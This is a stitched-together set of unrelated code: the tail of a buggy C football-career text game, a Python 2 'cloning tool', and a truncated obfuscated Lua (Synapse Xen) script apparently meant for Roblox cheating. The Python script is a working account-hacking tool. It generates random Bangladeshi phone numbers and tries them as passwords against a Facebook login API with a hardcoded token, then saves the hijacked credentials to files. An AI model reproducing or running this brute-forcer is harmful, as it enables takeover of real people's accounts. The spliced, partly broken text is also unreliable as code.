achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("Serie A top assister.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("3rd place Serie A.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("World Cup winner.\n"); } else if(position=="c"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Back~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Juventus F.C is facing against Inter Milan F.C with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Chiellini at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("What a wonderful tackle from %s\n",name1); sleep(3); printf("He just saved Juventus from a dangerous goal\n"); sleep(3); printf("***At 88'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Juventus's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Juventus got on 2nd place of the Serie A leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Serie A gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Juventus only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Tottenham Hotspur F.C.\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is scored by %s from a corner kick situation\n",name1); sleep(3); printf("\"Juventus finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Barcelona in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Chelsea in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... But your team lost this final round\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against England in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Portugal in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s can't beat Ronaldo to get into the semi-final round!\n",name1); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("Serie A best defender.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("2nd place Serie A.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("Kopa Trophy.\n"); }else{ printf("Incorrect. Try again!\n"); } }while(position!="a"&& position!="b"&& position!="c"); } } void ending(){ sleep(3); printf("~~~THANK YOU FOR PLAYING~~~\n"); } int main(){ introduction(); character(); begin(); LeagueSelection(); option1(); option2(); option3(); ending(); } #include <time.h> int msec = 0, trigger = 10, num; /* 10ms */ clock_t before = clock(); do { clock_t difference = clock() - before; msec = difference * 1000 / CLOCKS_PER_SEC; } while ( msec < trigger ); printf("Time taken %d seconds %d milliseconds)\n", msec/1000, msec%1000);
Hjkjgvvjjjg
# Mr. Fahim # IT'S Fahim import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass os.system('rm -rf .txt') def psb(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.03) psb('\x1b[1;32mBANGLADESH 08 DIGIT CLONING TOOL IS STARTING PLEASE WAIT ..........') for n in range(7777): nmbr = random.randint(11111111, 99999999) sys.stdout = open('.txt', 'a') print nmbr sys.stdout.flush() try: import requests except ImportError: os.system('pip2 install requests') try: import mechanize except ImportError: os.system('pip2 install mechanize') time.sleep(1) from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')] def exb(): print '[!] Exit' os.sys.exit() def psb(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.03) def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(3.0 / 200) def t(): time.sleep(1) def cb(): os.system('clear') logo = """ ██╗░░░░░░█████╗░██╗░░░██╗███████╗ ██║░░░░░██╔══██╗██║░░░██║██╔════╝ ██║░░░░░██║░░██║╚██╗░██╔╝█████╗░░ ██║░░░░░██║░░██║░╚████╔╝░██╔══╝░░ ███████╗╚█████╔╝░░╚██╔╝░░███████╗ ╚══════╝░╚════╝░░░░╚═╝░░░╚══════╝ ██╗░░██╗░█████╗░██╗░░██╗███████╗██████╗░ ██║░░██║██╔══██╗██║░██╔╝██╔════╝██╔══██╗ ███████║███████║█████═╝░█████╗░░██║░░██║ ██╔══██║██╔══██║██╔═██╗░██╔══╝░░██║░░██║ ██║░░██║██║░░██║██║░╚██╗███████╗██████╔╝ ╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚══════╝╚═════╝░ """ back = 0 successful = [] cpb = [] oks = [] id = [] print 'AUTHOR : MR. FAHIM' print 'FACEBOOK :--''tarek.khan.125760'' print 'GITHUB : Hjkjgvvjjjg/402 CorrectUsername = 'Tamanna' CorrectPassword = 'my.love' loop = 'true' while loop == 'true': username = raw_input('\x1b[1;91m \x1b[1;92mUSERNAME \x1b[1;92m: \x1b[1;92m') if username == CorrectUsername: password = raw_input('\x1b[1;91m \x1b[1;92mPASSWORD \x1b[1;92m: \x1b[1;92m') if password == CorrectPassword: print 'Logged in successfully as ' + username time.sleep(2) loop = 'false' else: print '\x1b[1;97mWrong Password' os.system('xdg-open https://www.facebook.com/Abal.Not.Allow.ok.Bro') else: print '\x1b[1;97mWrong Username' os.system('xdg-open https://www.facebook.com/Abal.Not.Allow.ok.Bro') name = raw_input('\x1b[1;92m\x1b[1;92m Enter Your Name: ') os.system('xdg-open https://www.facebook.com/groups/mental.gang.ccc5.tor.real.bap/?ref=share') def menu(): os.system('clear') print logo print '\x1b[1;91mONLY \x1b[1;91m08 \x1b[1;91m DIGITS HACKABLE ACCOUNTS ARE AVAILABLE' print jalan('\x1b[1;92m[1] \x1b[1;92mGRAMEENPHONE') jalan('\x1b[1;96m[2] \x1b[1;96mROBI') jalan('\x1b[1;92m[3] \x1b[1;92mAIRTEL') jalan('\x1b[1;96m[4] \x1b[1;96mBANGLALINK') jalan('\x1b[1;92m[5] \x1b[1;92mTELETALK') jalan('\x1b[1;96m[6] \x1b[1;96mGRAMEENPHONE \x1b[1;91m(NEW)') jalan('\x1b[1;92m[7] \x1b[1;92mBANGLALINK \x1b[1;91m(NEW)') print jalan('\x1b[1;90m[8] FIND ME ON FACEBOOK PAGE') jalan('\x1b[1;90m[9] TO CONTACT ADMIM') print jalan('\x1b[1;97m[00] EXIT') print 50 * '-' action() def action(): global cpb global oks bch = raw_input('\n\x1b[1;92m\xe2\x96\x84\xef\xb8\xbb\xcc\xb7\xcc\xbf\xe2\x94\xbb\xcc\xbf\xe2\x95\x90\xe2\x94\x81\xe4\xb8\x80 ') if bch == '': print '[!] Fill in correctly' action() elif bch == '1': os.system('clear') print logo print '\x1b[1;97mSIM CODE: TYPE \x1b[1;91m017' try: c = raw_input('\x1b[1;97mCHOOSE CODE : ') k = '+88' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '2': os.system('clear') print logo print '\x1b[1;97mSIM CODE: TYPE \x1b[1;91m018' try: c = raw_input('\x1b[1;97mCHOOSE CODE : ') k = '+88' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '3': os.system('clear') print logo print '\x1b[1;97mSIM CODE: TYPE \x1b[1;91m016' try: c = raw_input('\x1b[1;97mCHOOSE CODE : ') k = '+88' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '4': os.system('clear') print logo print '\x1b[1;97mSIM CODE: TYPE \x1b[1;91m019' try: c = raw_input('\x1b[1;97mCHOOSE CODE : ') k = '+88' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '5': os.system('clear') print logo print '\x1b[1;97mSIM CODE: TYPE \x1b[1;91m015' try: c = raw_input('\x1b[1;97mCHOOSE CODE : ') k = '+88' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '6': os.system('clear') print logo print '\x1b[1;97mSIM CODE: TYPE \x1b[1;91m013' try: c = raw_input('\x1b[1;97mCHOOSE CODE : ') k = '+88' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '7': os.system('clear') print logo print '\x1b[1;97mSIM CODE: TYPE \x1b[1;91m014' try: c = raw_input('\x1b[1;97mCHOOSE CODE : ') k = '+88' idlist = '.txt' for line in open(idlist, 'r').readlines(): id.append(line.strip()) except IOError: print '[!] File Not Found' raw_input('\n[ Back ]') menu() elif bch == '8': os.system('xdg-open https://www.facebook.com/Abal.Not.Allow.ok.Bro') time.sleep(1) menu() elif bch == '9': os.system('xdg-open https://www.facebook.com/Abal.Not.Allow.ok.Bro') time.sleep(1) menu() elif bch == '00': exb() else: print '[!] Fill in correctly' action() print '\x1b[1;90m======================================================>>' xxx = str(len(id)) psb('\x1b[1;92m[\xe2\x9c\x94] Total Numbers: ' + xxx) time.sleep(0.5) psb('\x1b[1;93m[\xe2\x9c\x93]\x1b[1;93m Please wait, process is running ...') time.sleep(0.5) psb('\x1b[1;96m[!] To Stop Process First Press CTRL Then Press z') time.sleep(0.5) print '\x1b[1;90m=======================================================>>' def main(arg): user = arg try: os.mkdir('save') except OSError: pass try: pass1 = user data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + c + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm') q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[Ok-Tutul-SUCCESSFUL]\x1b[0m ' + k + c + user + ' | ' + pass1 + '\n' + '\n' + '\x1b[1;92m [Login Now]\n' okb = open('save/successfull.txt', 'a') okb.write(k + c + user + '|' + c + pass1 + '\n') okb.close() oks.append(c + user + c + pass1) elif 'www.facebook.com' in q['error_msg']: print '\x1b[1;96m[Cp-Tutul-CHECKPOINT] \x1b[1;97m' + k + c + user + ' | ' + pass1 + '\x1b[1;96m [Login After 10 Days]\n' cps = open('save/checkpoint.txt', 'a') cps.write(k + c + user + '|' + c + pass1 + '\n') cps.close() cpb.append(c + user + c + pass1) except: pass p = ThreadPool(30) p.map(main, id) print 50 * '-' print '[\xe2\x9c\x93] Process Has Been Completed....' print '[\xe2\x9c\x93] Total OK/CP : ' + str(len(oks)) + '/' + str(len(cpb)) print '[\xe2\x9c\x93] CP File Has Been Saved : save/checkpoint.txt' raw_input('\n[Press Enter To Go Back]') os.system('python2 sh11.py') if __name__ == '__main__': menu()
hieu9955
--[[ Vouch My Thread On V3rmillion - TuranYmn12 ]] local SynapseXen_iiiIiIlliII=select;local SynapseXen_ilIIilI=string.byte; local SynapseXen_iIiIIi=string.sub; warn("Vouch My Thread On V3rmillion - TuranYmn12") local SynapseXen_lllliIlIlIIIl=string.char;local SynapseXen_iIIiIliIiiIIIIi=type;local SynapseXen_llliilIIllIiiIIII=table.concat;local unpack=unpack;local setmetatable=setmetatable;local pcall=pcall;local SynapseXen_IiilillliiIi,SynapseXen_iIIIllIlIIll,SynapseXen_IlIIlIIilIililIlll,SynapseXen_iiIii;if bit and bit.bxor then SynapseXen_IiilillliiIi=bit.bxor;SynapseXen_iIIIllIlIIll=function(SynapseXen_liIIiIlIIlIilllIiilI,SynapseXen_illiIII)local SynapseXen_iIlIIlIIIIIiIlli=SynapseXen_IiilillliiIi(SynapseXen_liIIiIlIIlIilllIiilI,SynapseXen_illiIII)if SynapseXen_iIlIIlIIIIIiIlli<0 then SynapseXen_iIlIIlIIIIIiIlli=4294967296+SynapseXen_iIlIIlIIIIIiIlli end;return SynapseXen_iIlIIlIIIIIiIlli end else SynapseXen_IiilillliiIi=function(SynapseXen_liIIiIlIIlIilllIiilI,SynapseXen_illiIII)local SynapseXen_IiIlii=function(SynapseXen_lIIII,SynapseXen_liIiI)return SynapseXen_lIIII%(SynapseXen_liIiI*2)>=SynapseXen_liIiI end;local SynapseXen_IiIlIIlI=0;for SynapseXen_IlIiI=0,31 do SynapseXen_IiIlIIlI=SynapseXen_IiIlIIlI+(SynapseXen_IiIlii(SynapseXen_liIIiIlIIlIilllIiilI,2^SynapseXen_IlIiI)~=SynapseXen_IiIlii(SynapseXen_illiIII,2^SynapseXen_IlIiI)and 2^SynapseXen_IlIiI or 0)end;return SynapseXen_IiIlIIlI end;SynapseXen_iIIIllIlIIll=SynapseXen_IiilillliiIi end;SynapseXen_IlIIlIIilIililIlll=function(SynapseXen_IiIil,SynapseXen_iIiiliillllIllll,SynapseXen_IIilIillIIii)return(SynapseXen_IiIil+SynapseXen_iIiiliillllIllll)%SynapseXen_IIilIillIIii end;SynapseXen_iiIii=function(SynapseXen_IiIil,SynapseXen_iIiiliillllIllll,SynapseXen_IIilIillIIii)return(SynapseXen_IiIil-SynapseXen_iIiiliillllIllll)%SynapseXen_IIilIillIIii end;local function SynapseXen_iliIiIIIiilIliIIil(SynapseXen_iIlIIlIIIIIiIlli)if SynapseXen_iIlIIlIIIIIiIlli<0 then SynapseXen_iIlIIlIIIIIiIlli=4294967296+SynapseXen_iIlIIlIIIIIiIlli end;return SynapseXen_iIlIIlIIIIIiIlli end;local getfenv=getfenv;if not getfenv then getfenv=function()return _ENV end end;local SynapseXen_ilIliiI={}local SynapseXen_IllIiIili={}local SynapseXen_IilllilIlIiIlillllI;local SynapseXen_IiIilliilIIl;local SynapseXen_IiIiIIilIli={}local SynapseXen_iIlIlIl={}for SynapseXen_IlIiI=0,255 do local SynapseXen_IlliilIiIill,SynapseXen_ilIIIlilli=SynapseXen_lllliIlIlIIIl(SynapseXen_IlIiI),SynapseXen_lllliIlIlIIIl(SynapseXen_IlIiI,0)SynapseXen_IiIiIIilIli[SynapseXen_IlliilIiIill]=SynapseXen_ilIIIlilli;SynapseXen_iIlIlIl[SynapseXen_ilIIIlilli]=SynapseXen_IlliilIiIill end;local function SynapseXen_liIIIiIIIllIIilI(SynapseXen_IlllliIIlIliIil,SynapseXen_iiIillliiIIiiiIiI,SynapseXen_lIIlIllil,SynapseXen_lIllilIIi)if SynapseXen_lIIlIllil>=256 then SynapseXen_lIIlIllil,SynapseXen_lIllilIIi=0,SynapseXen_lIllilIIi+1;if SynapseXen_lIllilIIi>=256 then SynapseXen_iiIillliiIIiiiIiI={}SynapseXen_lIllilIIi=1 end end;SynapseXen_iiIillliiIIiiiIiI[SynapseXen_lllliIlIlIIIl(SynapseXen_lIIlIllil,SynapseXen_lIllilIIi)]=SynapseXen_IlllliIIlIliIil;SynapseXen_lIIlIllil=SynapseXen_lIIlIllil+1;return SynapseXen_iiIillliiIIiiiIiI,SynapseXen_lIIlIllil,SynapseXen_lIllilIIi end;local function SynapseXen_iIillIiili(SynapseXen_lIIllIiIillI)local function SynapseXen_llliIllII(SynapseXen_IillllllIiiIliiIIil)local SynapseXen_lIllilIIi='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'SynapseXen_IillllllIiiIliiIIil=string.gsub(SynapseXen_IillllllIiiIliiIIil,'[^'..SynapseXen_lIllilIIi..'=]','')return SynapseXen_IillllllIiiIliiIIil:gsub('.',function(SynapseXen_IiIil)if SynapseXen_IiIil=='='then return''end;local SynapseXen_iliiil,SynapseXen_IIlIIIiillIiIiIIIiii='',SynapseXen_lIllilIIi:find(SynapseXen_IiIil)-1;for SynapseXen_IlIiI=6,1,-1 do SynapseXen_iliiil=SynapseXen_iliiil..(SynapseXen_IIlIIIiillIiIiIIIiii%2^SynapseXen_IlIiI-SynapseXen_IIlIIIiillIiIiIIIiii%2^(SynapseXen_IlIiI-1)>0 and'1'or'0')end;return SynapseXen_iliiil end):gsub('%d%d%d?%d?%d?%d?%d?%d?',function(SynapseXen_IiIil)if#SynapseXen_IiIil~=8 then return''end;local SynapseXen_IIiIi=0;for SynapseXen_IlIiI=1,8 do SynapseXen_IIiIi=SynapseXen_IIiIi+(SynapseXen_IiIil:sub(SynapseXen_IlIiI,SynapseXen_IlIiI)=='1'and 2^(8-SynapseXen_IlIiI)or 0)end;return string.char(SynapseXen_IIiIi)end)end;SynapseXen_lIIllIiIillI=SynapseXen_llliIllII(SynapseXen_lIIllIiIillI)local SynapseXen_iiiIilIiI=SynapseXen_iIiIIi(SynapseXen_lIIllIiIillI,1,1)if SynapseXen_iiiIilIiI=="u"then return SynapseXen_iIiIIi(SynapseXen_lIIllIiIillI,2)elseif SynapseXen_iiiIilIiI~="c"then error("Synapse Xen - Failed to verify bytecode. Please make sure your Lua implementation supports non-null terminated strings.")end;SynapseXen_lIIllIiIillI=SynapseXen_iIiIIi(SynapseXen_lIIllIiIillI,2)local SynapseXen_llIiIl=#SynapseXen_lIIllIiIillI;local SynapseXen_iiIillliiIIiiiIiI={}local SynapseXen_lIIlIllil,SynapseXen_lIllilIIi=0,1;local SynapseXen_IilliIIiilIIllIl={}local SynapseXen_iIlIIlIIIIIiIlli=1;local SynapseXen_IliiIlI=SynapseXen_iIiIIi(SynapseXen_lIIllIiIillI,1,2)SynapseXen_IilliIIiilIIllIl[SynapseXen_iIlIIlIIIIIiIlli]=SynapseXen_iIlIlIl[SynapseXen_IliiIlI]or SynapseXen_iiIillliiIIiiiIiI[SynapseXen_IliiIlI]SynapseXen_iIlIIlIIIIIiIlli=SynapseXen_iIlIIlIIIIIiIlli+1;for SynapseXen_IlIiI=3,SynapseXen_llIiIl,2 do local SynapseXen_iIlllliiiilIiIiIIi=SynapseXen_iIiIIi(SynapseXen_lIIllIiIillI,SynapseXen_IlIiI,SynapseXen_IlIiI+1)local SynapseXen_iIIiiliIllliIiiiIll=SynapseXen_iIlIlIl[SynapseXen_IliiIlI]or SynapseXen_iiIillliiIIiiiIiI[SynapseXen_IliiIlI]if not SynapseXen_iIIiiliIllliIiiiIll then error("Synapse Xen - Failed to verify bytecode. Please make sure your Lua implementation supports non-null terminated strings.")end;local SynapseXen_illIilIIIIIiliIlIIii=SynapseXen_iIlIlIl[SynapseXen_iIlllliiiilIiIiIIi]or SynapseXen_iiIillliiIIiiiIiI[SynapseXen_iIlllliiiilIiIiIIi]if SynapseXen_illIilIIIIIiliIlIIii then SynapseXen_IilliIIiilIIllIl[SynapseXen_iIlIIlIIIIIiIlli]=SynapseXen_illIilIIIIIiliIlIIii;SynapseXen_iIlIIlIIIIIiIlli=SynapseXen_iIlIIlIIIIIiIlli+1;SynapseXen_iiIillliiIIiiiIiI,SynapseXen_lIIlIllil,SynapseXen_lIllilIIi=SynapseXen_liIIIiIIIllIIilI(SynapseXen_iIIiiliIllliIiiiIll..SynapseXen_iIiIIi(SynapseXen_illIilIIIIIiliIlIIii,1,1),SynapseXen_iiIillliiIIiiiIiI,SynapseXen_lIIlIllil,SynapseXen_lIllilIIi)else local SynapseXen_liIiliiiIi=SynapseXen_iIIiiliIllliIiiiIll..SynapseXen_iIiIIi(SynapseXen_iIIiiliIllliIiiiIll,1,1)SynapseXen_IilliIIiilIIllIl[SynapseXen_iIlIIlIIIIIiIlli]=SynapseXen_liIiliiiIi;SynapseXen_iIlIIlIIIIIiIlli=SynapseXen_iIlIIlIIIIIiIlli+1;SynapseXen_iiIillliiIIiiiIiI,SynapseXen_lIIlIllil,SynapseXen_lIllilIIi=SynapseXen_liIIIiIIIllIIilI(SynapseXen_liIiliiiIi,SynapseXen_iiIillliiIIiiiIiI,SynapseXen_lIIlIllil,SynapseXen_lIllilIIi)end;SynapseXen_IliiIlI=SynapseXen_iIlllliiiilIiIiIIi end;return SynapseXen_llliilIIllIiiIIII(SynapseXen_IilliIIiilIIllIl)end;local function SynapseXen_IlilIiiiiIili(SynapseXen_liIIiI,SynapseXen_iIIliIi,SynapseXen_lIillilIilIIli)if SynapseXen_lIillilIilIIli then local SynapseXen_iIIliIIiIilliii=SynapseXen_liIIiI/2^(SynapseXen_iIIliIi-1)%2^(SynapseXen_lIillilIilIIli-1-(SynapseXen_iIIliIi-1)+1)return SynapseXen_iIIliIIiIilliii-SynapseXen_iIIliIIiIilliii%1 else local SynapseXen_ilIllIlliillIIlilli=2^(SynapseXen_iIIliIi-1)if SynapseXen_liIIiI%(SynapseXen_ilIllIlliillIIlilli+SynapseXen_ilIllIlliillIIlilli)>=SynapseXen_ilIllIlliillIIlilli then return 1 else return 0 end end end;local function SynapseXen_IiiliIlIllIil()local SynapseXen_IlIiIil=SynapseXen_IiilillliiIi(3855667269,SynapseXen_IiIilliilIIl)while true do if SynapseXen_IlIiIil==SynapseXen_IiilillliiIi(3855666810,SynapseXen_IiIilliilIIl)then SynapseXen_IilllilIlIiIlillllI=function(SynapseXen_iIiilliiilii,SynapseXen_ilIiIlililllIil)return SynapseXen_IiilillliiIi(SynapseXen_iIiilliiilii-2812,SynapseXen_ilIiIlililllIil+37927)-SynapseXen_IiilillliiIi(1319943582,SynapseXen_IiIilliilIIl)end;SynapseXen_IlIiIil=SynapseXen_IiilillliiIi(SynapseXen_IlIiIil,SynapseXen_IiilillliiIi(2898358907,SynapseXen_IiIilliilIIl))elseif SynapseXen_IlIiIil==SynapseXen_IiilillliiIi(3855667269,SynapseXen_IiIilliilIIl)then SynapseXen_IilllilIlIiIlillllI=function(SynapseXen_iIiilliiilii,SynapseXen_ilIiIlililllIil)return SynapseXen_IiilillliiIi(SynapseXen_iIiilliiilii-8544,SynapseXen_ilIiIlililllIil-42390)-SynapseXen_IiilillliiIi(1319933057,SynapseXen_IiIilliilIIl)end;SynapseXen_IlIiIil=SynapseXen_IlIiIil-SynapseXen_IiilillliiIi(1319941881,SynapseXen_IiIilliilIIl)elseif SynapseXen_IlIiIil==SynapseXen_IiilillliiIi(1804550305,SynapseXen_IllIiIili[6])then SynapseXen_IilllilIlIiIlillllI=function(SynapseXen_iIiilliiilii,SynapseXen_ilIiIlililllIil)return SynapseXen_IiilillliiIi(SynapseXen_iIiilliiilii+30999,SynapseXen_ilIiIlililllIil-42851)-SynapseXen_IiilillliiIi(1319955578,SynapseXen_IiIilliilIIl)end;SynapseXen_IlIiIil=SynapseXen_IlIiIil+SynapseXen_IiilillliiIi(523026661,SynapseXen_IllIiIili[4])elseif SynapseXen_IlIiIil==SynapseXen_IiilillliiIi(1446846680,SynapseXen_IllIiIili[4])then SynapseXen_IilllilIlIiIlillllI=function(SynapseXen_iIiilliiilii,SynapseXen_ilIiIlililllIil)return SynapseXen_IiilillliiIi(SynapseXen_iIiilliiilii+45157,SynapseXen_ilIiIlililllIil+26308)+SynapseXen_IiilillliiIi(846803656,SynapseXen_IllIiIili[1])end;SynapseXen_IlIiIil=SynapseXen_IiilillliiIi(SynapseXen_IlIiIil,SynapseXen_IiilillliiIi(4197231965,SynapseXen_IiIilliilIIl))elseif SynapseXen_IlIiIil==SynapseXen_IiilillliiIi(3007130756,SynapseXen_IiIilliilIIl)then return elseif SynapseXen_IlIiIil==SynapseXen_IiilillliiIi(3488149833,SynapseXen_IllIiIili[1])then SynapseXen_IilllilIlIiIlillllI=function(SynapseXen_iIiilliiilii,SynapseXen_ilIiIlililllIil)return SynapseXen_IiilillliiIi(SynapseXen_iIiilliiilii-18483,SynapseXen_ilIiIlililllIil+19323)+SynapseXen_IiilillliiIi(4236822034,SynapseXen_IllIiIili[8])end;SynapseXen_IlIiIil=SynapseXen_IlIiIil-SynapseXen_IiilillliiIi(1319955946,SynapseXen_IiIilliilIIl)end end end;local function SynapseXen_iIIllIIII(SynapseXen_IiiIlililIlIiiii)local SynapseXen_liillIIlliiiIIl=1;local SynapseXen_iIIIIlIl;local SynapseXen_IIiIllIi;local function SynapseXen_IliiiIIIiilIllIIlil()local SynapseXen_IIliII=SynapseXen_ilIIilI(SynapseXen_IiiIlililIlIiiii,SynapseXen_liillIIlliiiIIl,SynapseXen_liillIIlliiiIIl)SynapseXen_liillIIlliiiIIl=SynapseXen_liillIIlliiiIIl+1;return SynapseXen_IIliII end;local function SynapseXen_lIillllliIli()local SynapseXen_lililiiliiIiiiiI,SynapseXen_iIiilliiilii,SynapseXen_ilIiIlililllIil,SynapseXen_IlIlIiiiIilliiliilIl=SynapseXen_ilIIilI(SynapseXen_IiiIlililIlIiiii,SynapseXen_liillIIlliiiIIl,SynapseXen_liillIIlliiiIIl+3)SynapseXen_liillIIlliiiIIl=SynapseXen_liillIIlliiiIIl+4;return SynapseXen_IlIlIiiiIilliiliilIl*16777216+SynapseXen_ilIiIlililllIil*65536+SynapseXen_iIiilliiilii*256+SynapseXen_lililiiliiIiiiiI end;local function SynapseXen_iliiIIiIl()return SynapseXen_lIillllliIli()*4294967296+SynapseXen_lIillllliIli()end;local function SynapseXen_iIIililIiiiill()local SynapseXen_iIiiiIlIiiIllIlliI=SynapseXen_iIIIllIlIIll(SynapseXen_lIillllliIli(),SynapseXen_ilIliiI[1267869007]or(function()local SynapseXen_IiIil="epic gamer vision"SynapseXen_ilIliiI[1267869007]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2294385245,3141878040),SynapseXen_IiilillliiIi(405970966,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{830297185,2707010430,4084762625,4218612234,61280943,1594101614,181454963}return SynapseXen_ilIliiI[1267869007]end)())local SynapseXen_iiiilIIlilllIlIiil=SynapseXen_iIIIllIlIIll(SynapseXen_lIillllliIli(),SynapseXen_ilIliiI[1921484102]or(function()local SynapseXen_IiIil="xen detects custom 